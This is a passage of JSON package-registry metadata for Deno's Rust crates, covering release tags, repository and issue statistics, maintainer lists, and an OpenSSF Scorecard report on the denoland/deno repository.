417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T11:48:15.781Z","dependent_packages_count":0,"downloads":38754,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":55.34981178505731,"dependent_repos_count":16.706699993903555,"dependent_packages_count":22.074823711109754,"stargazers_count":0.024770467106037905,"forks_count":0.040607323124652296,"docker_downloads_count":null,"average":18.83934265606026},"purl":"pkg:cargo/deno_node_crypto","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node_crypto","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node_crypto","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node_crypto/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_crypto/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-03-04T18:06:12.362Z","updated_at":"2026-03-04T18:06:12.362Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-12T15:17:54.923Z","updated_at":"2026-02-12T15:17:54.923Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8525412,"name":"deno_cron","ecosystem":"cargo","description":"Implementation of the Deno cron API","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":137,"first_release_published_at":"2023-11-02T00:01:36.295Z","latest_release_published_at":"2026-08-06T11:47:50.000Z","latest_release_number":"0.137.0","last_synced_at":"2026-08-29T21:57:04.005Z","created_at":"2023-11-02T00:06:10.910Z","updated_at":"2026-08-30T11:48:15.798Z","registry_url":"https://crates.io/crates/deno_cron/","install_command":"cargo install deno_cron","documentation_url":"https://docs.rs/deno_cron/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow 